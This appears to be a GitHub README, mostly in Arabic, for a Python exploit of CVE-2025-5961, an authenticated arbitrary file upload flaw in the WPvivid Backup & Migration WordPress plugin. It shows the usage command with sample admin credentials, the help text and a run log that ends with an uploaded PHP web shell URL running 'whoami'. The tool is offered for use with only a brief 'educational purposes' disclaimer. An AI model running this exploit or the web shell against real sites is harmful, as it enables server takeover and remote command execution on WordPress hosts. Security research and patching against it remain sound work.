
الترحيل، النسخ الاحتياطي، التدريج – WPvivid Backup & Migration <= 0.9.116 - رفع ملفات تعسّفي مُصادَق عليه (مدير+)
📈 تؤثر هذه الثغرة على إضافة لديها أكثر من 700,000+ عملية تثبيت
الإضافة Migration, Backup, Staging – WPvivid Backup & Migration الخاصة بووردبريس معرّضة لـ رفع ملفات تعسفي بسبب غياب التحقق من نوع الملف في الدالة wpvivid_upload_import_files في جميع الإصدارات حتى 0.9.116 وما يشمله.
يتيح ذلك لـ المهاجمين المصادَق عليهم (بصلاحية مسؤول أو أعلى) رفع ملفات تعسفية إلى الخادم، مما قد يتيح تنفيذ أوامر عن بُعد.
يحتوي هذا المستودع على سكربت استغلال لـ CVE-2025-5961، مكتوب بلغة Python، والذي:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
هذا السكربت مُقدَّم لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
Khaled Alenazi (Nxploited)
🌐 GitHub